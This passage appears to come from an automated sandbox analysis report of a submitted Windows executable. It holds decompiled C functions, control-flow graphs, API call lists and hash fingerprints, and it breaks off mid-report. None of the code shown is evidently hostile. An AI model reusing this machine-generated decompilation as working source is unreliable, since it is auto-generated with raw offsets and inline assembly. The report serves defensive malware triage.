                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction ID: 207b1b8771569bb39d21ff3be241c2a042127402aedffa1bc22b33ac5a943006
                              • Opcode Fuzzy Hash: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                              • Instruction Fuzzy Hash: 7A01C4323002119BD630AF69FC86A9A7BA5FB41715BA2802FF45057151DB7CD8C28B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1095 407093-4070c7 call 413954 EnterCriticalSection call 4065b2 1099 4070c9-4070d7 call 406505 1095->1099 1100 4070da-4070f2 LeaveCriticalSection 1095->1100 1099->1100
                              C-Code - Quality: 100%
                              			E00407093(intOrPtr* __ecx) {
                              				intOrPtr* _t15;
                              				void* _t16;
                              				void* _t22;
                              				struct _CRITICAL_SECTION* _t23;
                              				void* _t25;
                              				intOrPtr* _t26;
                              				intOrPtr* _t29;
                              				void* _t30;
                              
                              				E00413954(E00419874, _t30);
                              				_t26 = __ecx;
                              				_t23 = __ecx + 4;
                              				 *(_t30 - 0x10) = _t23;
                              				EnterCriticalSection(_t23);
                              				_t15 =  *_t26;
                              				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                              				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
                              				if(_t16 == 0) {
                              					_t29 =  *_t26;
                              					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
                              				}
                              				LeaveCriticalSection(_t23);
                              				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                              				return _t16;
                              			}












                              APIs
                              • __EH_prolog.LIBCMT ref: 00407098
                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterH_prologLeave
                              • String ID:
                              • API String ID: 367238759-0
                              • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                              • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                              • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1103 40dd8b-40ddb0 call 413954 call 40776f 1108 40ddb6-40ddbf call 40df2c 1103->1108 1109 40df1b-40df29 1103->1109 1112 40ddc1-40ddc3 1108->1112 1113 40ddc8-40ddfe call 4076d5 call 414090 1108->1113 1112->1109 1118 40de01-40de06 1113->1118 1119 40de25-40de47 call 406505 1118->1119 1120 40de08-40de15 1118->1120 1126 40df07 1119->1126 1127 40de4d-40de55 1119->1127 1121 40decb-40dece 1120->1121 1122 40de1b 1120->1122 1124 40df09-40df19 call 403a9c 1121->1124 1122->1119 1125 40de1d-40de1f 1122->1125 1124->1109 1125->1119 1125->1121 1126->1124 1127->1121 1129 40de57-40de5b 1127->1129 1129->1119 1131 40de5d-40de6d 1129->1131 1132 40dec6-40dec9 1131->1132 1133 40de6f 1131->1133 1134 40deaa-40dec1 call 413980 1132->1134 1135 40de77 1133->1135 1134->1118 1137 40de7a-40de7e 1135->1137 1139 40de80-40de82 1137->1139 1140 40de8a 1137->1140 1141 40de84-40de88 1139->1141 1142 40de8c 1139->1142 1140->1142 1141->1137 1142->1134 1143 40de8e-40de97 call 40df2c 1142->1143 1146 40ded0-40df04 call 414090 call 4065b2 1143->1146 1147 40de99-40dea2 1143->1147 1146->1126 1148 40de71-40de74 1147->1148 1149 40dea4-40dea7 1147->1149 1148->1135 1149->1134
                              C-Code - Quality: 95%
                              			E0040DD8B(void* __ecx, void* __eflags) {
                              				intOrPtr _t57;
                              				intOrPtr _t65;
                              				intOrPtr _t67;
                              				intOrPtr _t69;
                              				intOrPtr _t71;
                              				intOrPtr* _t75;
                              				intOrPtr* _t80;
                              				void* _t83;
                              				intOrPtr _t85;
                              				intOrPtr _t93;
                              				void* _t95;
                              				void* _t98;
                              				intOrPtr* _t100;
                              				intOrPtr _t104;
                              				intOrPtr _t107;
                              				intOrPtr _t109;
                              				intOrPtr _t110;
                              				intOrPtr* _t111;
                              				void* _t113;
                              				intOrPtr _t115;
                              				void* _t116;
                              				void* _t118;
                              				void* _t119;
                              				void* _t121;
                              
                              				E00413954(E0041A630, _t116);
                              				_t119 = _t118 - 0x20;
                              				_t113 = __ecx;
                              				_t83 = __ecx + 0x28;
                              				_t107 = 0x20;
                              				_t57 = E0040776F(__eflags, _t107); // executed
                              				if(_t57 == 0) {
                              					if(E0040DF2C(_t83) == 0) {
                              						__eflags = 0;
                              						 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
                              						 *((intOrPtr*)(_t116 - 0x28)) = 0;
                              						 *((intOrPtr*)(_t116 - 0x24)) = 0;
                              						 *((intOrPtr*)(_t116 - 4)) = 0;
                              						E004076D5(_t116 - 0x2c, 0x10000);
                              						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
                              						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
                              						E00414090( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
                              						_t109 =  *((intOrPtr*)(_t113 + 0x20));
                              						_t85 =  *((intOrPtr*)(_t113 + 0x24));
                              						_t121 = _t119 + 0xc;
                              						while(1) {
                              							L4:
                              							_t100 =  *((intOrPtr*)(_t116 + 0xc));
                              							__eflags = _t100;
                              							if(_t100 == 0) {
                              								goto L8;
                              							}
                              							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
                              							asm("sbb eax, [esi+0x24]");
                              							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
                              							if(__eflags > 0) {
                              								L25:
                              								_t115 = 1;
                              							} else {
                              								if(__eflags < 0) {
                              									goto L8;
                              								} else {
                              									__eflags = _t95 -  *_t100;
                              									if(_t95 >  *_t100) {
                              										goto L25;
                              									} else {
                              										while(1) {
                              											L8:
                              											_t65 =  *((intOrPtr*)(_t116 - 0x10));
                              											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
                              											__eflags = _t67;
                              											if(_t67 != 0) {
                              												break;
                              											}
                              											_t69 =  *((intOrPtr*)(_t116 - 0x20));
                              											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
                              											__eflags = _t69;
                              											if(_t69 == 0) {
                              												goto L25;
                              											} else {
                              												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
                              												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
                              													continue;
                              												} else {
                              													_t104 = 0;
                              													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
                              													 *((intOrPtr*)(_t116 - 0x14)) = 0;
                              													__eflags = _t71;
                              													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
                              													if(_t71 <= 0) {
                              														_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              														goto L23;
                              													} else {
                              														while(1) {
                              															_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              															while(1) {
                              																L15:
                              																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
                              																if( *((char*)(_t104 + _t93)) == 0x37) {
                              																	break;
                              																}
                              																__eflags = _t104 - _t71;
                              																if(__eflags < 0) {
                              																	_t104 = _t104 + 1;
                              																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
                              																	continue;
                              																}
                              																L19:
                              																if(__eflags == 0) {
                              																	L23:
                              																	_t109 = _t109 + _t71;
                              																	asm("adc ebx, 0x0");
                              																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
                              																	E00413980(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
                              																	_t121 = _t121 + 0xc;
                              																	goto L4;
                              																} else {
                              																	_t75 = E0040DF2C(_t93 + _t104);
                              																	__eflags = _t75;
                              																	if(_t75 != 0) {
                              																		E00414090(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
                              																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
                              																		_t80 =  *((intOrPtr*)(_t116 + 8));
                              																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
                              																		_t98 = 0;
                              																		asm("adc ebx, ecx");
                              																		_t111 = _t110 + 0x20;
                              																		__eflags = _t111;
                              																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
                              																		asm("adc ebx, ecx");
                              																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
                              																		goto L27;
                              																	} else {
                              																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
                              																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
                              																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
                              																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
                              																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
                              																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              																			continue;
                              																		} else {
                              																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
                              																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
                              																			goto L23;
                              																		}
                              																	}
                              																}
                              																goto L28;
                              															}
                              															__eflags = _t104 - _t71;
                              															goto L19;
                              														}
                              													}
                              												}
                              											}
                              											goto L28;
                              										}
                              										L27:
                              										_t115 = _t67;
                              									}
                              								}
                              							}
                              							L28:
                              							 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
                              							E00403A9C( *((intOrPtr*)(_t116 - 0x24)));
                              							_t57 = _t115;
                              							goto L29;
                              						}
                              					} else {
                              						_t57 = 0;
                              					}
                              				}
                              				L29:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
                              				return _t57;
                              			}




























                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-3916222277
                              • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                              • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                              • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1154 403113-40313f call 413954 call 402ee1 call 405841 1161 403141-403156 call 401d1b 1154->1161 1162 403158-40315d 1154->1162 1168 4031b9-4031c1 call 403a9c 1161->1168 1164 403167 1162->1164 1165 40315f-403165 1162->1165 1167 40316a-4031a9 call 4032a8 call 408f0a call 4042ad 1164->1167 1165->1167 1179 4031c6-4031e8 call 401ce1 call 405d0b call 4049dd 1167->1179 1180 4031ab-4031b4 call 401d1b 1167->1180 1174 403298 1168->1174 1176 403299-4032a7 1174->1176 1188 40322a-40327f call 401c80 call 402685 call 403a9c 1179->1188 1189 4031ea-403228 call 409569 call 401d7a call 403a9c * 3 1179->1189 1180->1168 1211 403281 call 40c231 1188->1211 1212 403281 call 40bbc9 1188->1212 1189->1176 1204 403284-403297 call 403a9c * 2 1204->1174 1211->1204 1212->1204
                              C-Code - Quality: 95%
                              			E00403113(intOrPtr* __ecx, void* __eflags) {
                              				void* _t63;
                              				intOrPtr _t64;
                              				intOrPtr _t68;
                              				intOrPtr _t73;
                              				intOrPtr* _t82;
                              				void* _t85;
                              				void* _t87;
                              				void* _t121;
                              				void* _t124;
                              				intOrPtr _t126;
                              				intOrPtr* _t129;
                              				void* _t131;
                              
                              				E00413954(E004192B0, _t131);
                              				_t129 = __ecx;
                              				E00402EE1(_t131 - 0x40);
                              				_push( *((intOrPtr*)(__ecx + 4)));
                              				 *((intOrPtr*)(_t131 - 4)) = 0;
                              				_t63 = E00405841(_t131 - 0x68, _t121); // executed
                              				if(_t63 != 0) {
                              					_t64 =  *((intOrPtr*)(__ecx + 0x1c));
                              					__eflags = _t64;
                              					if(_t64 == 0) {
                              						 *((intOrPtr*)(_t131 - 0x10)) = 0;
                              					} else {
                              						 *((intOrPtr*)(_t131 - 0x10)) = _t64 + 4;
                              					}
                              					E004032A8(_t131 - 0x30, 4);
                              					 *((intOrPtr*)(_t131 - 0x30)) = 0x41b378;
                              					_t126 = _t129 + 0x28;
                              					 *((char*)(_t131 - 4)) = 1;
                              					_t68 = E00408F0A(_t126,  *_t129, _t131 - 0x30, 0, 0, _t129 + 4,  *((intOrPtr*)(_t131 - 0x10))); // executed
                              					 *((intOrPtr*)(_t129 + 0x60)) = _t68;
                              					 *((char*)(_t131 - 4)) = 0;
                              					E004042AD(_t131 - 0x30);
                              					__eflags =  *((intOrPtr*)(_t129 + 0x60));
                              					if( *((intOrPtr*)(_t129 + 0x60)) == 0) {
                              						E00401CE1(_t131 - 0x1c, _t129 + 0x10);
                              						 *((char*)(_t131 - 4)) = 2;
                              						E00405D0B(_t131 - 0x1c);
                              						_t73 = E004049DD( *((intOrPtr*)(_t131 - 0x1c))); // executed
                              						__eflags = _t73;
                              						if(__eflags != 0) {
                              							E00401C80(_t131 - 0x28, L"Default");
                              							 *((char*)(_t131 - 4)) = 4;
                              							E00402685( *((intOrPtr*)(_t129 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4)))), _t131 - 0x1c, _t131 - 0x28, _t131 - 0x50, 0);
                              							 *((char*)(_t131 - 4)) = 2;
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
                              							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4))));
                              							 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)( *_t82 + 0x1c))(_t82, 0, 0xffffffff, 0,  *((intOrPtr*)(_t129 + 0x20)));
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
                              							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                              							goto L11;
                              						} else {
                              							_push(_t131 - 0x1c);
                              							_t124 = 9;
                              							_t87 = E00409569(_t131 - 0x28, _t124, __eflags);
                              							 *((char*)(_t131 - 4)) = 3;
                              							E00401D7A(_t129 + 0x64, _t87);
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
                              							 *((intOrPtr*)(_t129 + 0x60)) = 0x80004005;
                              							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
                              							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                              						}
                              					} else {
                              						E00401D1B(_t129 + 0x64,  *0x420320);
                              						goto L7;
                              					}
                              				} else {
                              					E00401D1B(__ecx + 0x64,  *0x42031c);
                              					 *((intOrPtr*)(__ecx + 0x60)) = 0x80004005;
                              					L7:
                              					_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                              					L11:
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
                              				return _t85;
                              			}
















                              APIs
                              • __EH_prolog.LIBCMT ref: 00403118
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: Default
                              • API String ID: 3519838083-753088835
                              • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                              • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                              • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 85%
                              			E00402F15(intOrPtr __ecx, void* __edx, void* __eflags) {
                              				intOrPtr _t57;
                              				void* _t73;
                              				intOrPtr _t90;
                              				void* _t109;
                              				intOrPtr _t115;
                              				intOrPtr _t116;
                              				void* _t118;
                              
                              				E00413954(E00419269, _t118);
                              				 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) = 0;
                              				E00403376(_t118 - 0x94);
                              				 *(_t118 - 4) = 0;
                              				 *((intOrPtr*)(_t118 - 0x94)) = __ecx;
                              				E00401D7A(_t118 - 0x90, __edx);
                              				E00401D7A(_t118 - 0x84,  *((intOrPtr*)(_t118 + 8)));
                              				_push(0xf0);
                              				_t90 = E00403A76();
                              				 *((intOrPtr*)(_t118 + 8)) = _t90;
                              				 *(_t118 - 4) = 1;
                              				if(_t90 == 0) {
                              					_t57 = 0;
                              					__eflags = 0;
                              				} else {
                              					_t57 = E004034E3(_t90);
                              				}
                              				 *(_t118 - 4) = 0;
                              				 *((intOrPtr*)(_t118 - 0x78)) = _t57;
                              				E0040640D(_t118 - 0x74, _t57);
                              				if( *((intOrPtr*)(_t118 + 0xc)) == 0) {
                              					E00403113(_t118 - 0x94, __eflags);
                              					goto L8;
                              				} else {
                              					 *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xd8)) = 1;
                              					 *((intOrPtr*)(_t118 + 0xc)) = 0;
                              					 *(_t118 - 4) = 2;
                              					_t116 = E00413220(_t118 + 0xc, E004032E1, _t118 - 0x94);
                              					if(_t116 == 0) {
                              						 *((intOrPtr*)(_t118 - 0x18)) = 0;
                              						 *((intOrPtr*)(_t118 - 0x14)) = 0;
                              						 *((intOrPtr*)(_t118 - 0x10)) = 0;
                              						E00402170(_t118 - 0x18, 3);
                              						_t109 = 0x45;
                              						 *(_t118 - 4) = 3;
                              						_t73 = E0040602F(_t109);
                              						 *(_t118 - 4) = 4;
                              						E00401D7A(_t118 - 0x18, _t73);
                              						 *(_t118 - 4) = 3;
                              						E00403A9C( *((intOrPtr*)(_t118 - 0x24)));
                              						_push(_t118 + 0xc);
                              						_push(_t118 - 0x18);
                              						E0040309D( *((intOrPtr*)(_t118 - 0x78)));
                              						E00403A9C( *((intOrPtr*)(_t118 - 0x18)));
                              						 *(_t118 - 4) = 0;
                              						E004131E0(_t118 + 0xc);
                              						L8:
                              						_t38 = _t118 + 0x14; // 0x414be4
                              						_t115 =  *_t38;
                              						E00401D7A(_t115, _t118 - 0x30);
                              						__eflags =  *((intOrPtr*)(_t115 + 4));
                              						if(__eflags == 0) {
                              							__eflags =  *((intOrPtr*)(_t118 - 0x78)) + 0xe4;
                              							E00401D7A(_t115,  *((intOrPtr*)(_t118 - 0x78)) + 0xe4);
                              						}
                              						_t116 =  *((intOrPtr*)(_t118 - 0x34));
                              						 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xe0));
                              					} else {
                              						E004131E0(_t118 + 0xc);
                              					}
                              				}
                              				 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
                              				E0040348A(_t118 - 0x94,  *(_t118 - 4)); // executed
                              				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
                              				return _t116;
                              			}











                              APIs
                              • __EH_prolog.LIBCMT ref: 00402F1A
                                • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CloseErrorHandleLastShowWindow
                              • String ID: KA
                              • API String ID: 2740091781-4133974868
                              • Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                              • Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                              • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E00408902(intOrPtr* __ecx) {
                              				long _t33;
                              				intOrPtr* _t34;
                              				intOrPtr* _t35;
                              				intOrPtr* _t39;
                              				intOrPtr* _t43;
                              				intOrPtr* _t59;
                              				long _t62;
                              				intOrPtr* _t64;
                              				void* _t65;
                              
                              				E00413954(E00419B00, _t65);
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t59 = __ecx;
                              				 *((intOrPtr*)(_t65 - 0x14)) = 0;
                              				 *(_t65 - 4) = 0;
                              				 *((intOrPtr*)(_t65 - 0x10)) = 0;
                              				 *(_t65 - 4) = 1;
                              				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
                              					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
                              						goto L12;
                              					} else {
                              						_push(0x10);
                              						_t39 = E00403A76();
                              						if(_t39 == 0) {
                              							_t64 = 0;
                              						} else {
                              							 *((intOrPtr*)(_t39 + 4)) = 0x41b5e8;
                              							 *((intOrPtr*)(_t39 + 8)) = 0;
                              							 *(_t39 + 0xc) =  *(_t39 + 0xc) | 0xffffffff;
                              							 *_t39 = 0x41b494;
                              							 *((intOrPtr*)(_t39 + 4)) = 0x41b484;
                              							_t64 = _t39;
                              						}
                              						E0040640D(_t65 - 0x14, _t64);
                              						if(E00406434(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
                              							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
                              							goto L12;
                              						} else {
                              							_t33 = GetLastError();
                              						}
                              					}
                              				} else {
                              					_push(8);
                              					_t43 = E00403A76();
                              					if(_t43 == 0) {
                              						_t43 = 0;
                              					} else {
                              						 *((intOrPtr*)(_t43 + 4)) = 0;
                              						 *_t43 = 0x41b600;
                              					}
                              					E0040640D(_t65 - 0x10, _t43);
                              					L12:
                              					_t33 = E00408524(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
                              				}
                              				_t62 = _t33;
                              				_t34 =  *((intOrPtr*)(_t65 - 0x10));
                              				 *(_t65 - 4) = 0;
                              				if(_t34 != 0) {
                              					 *((intOrPtr*)( *_t34 + 8))(_t34);
                              				}
                              				_t35 =  *((intOrPtr*)(_t65 - 0x14));
                              				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
                              				if(_t35 != 0) {
                              					 *((intOrPtr*)( *_t35 + 8))(_t35);
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
                              				return _t62;
                              			}













                              APIs
                              • __EH_prolog.LIBCMT ref: 00408907
                              • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID:
                              • API String ID: 1057991267-0
                              • Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                              • Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                              • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
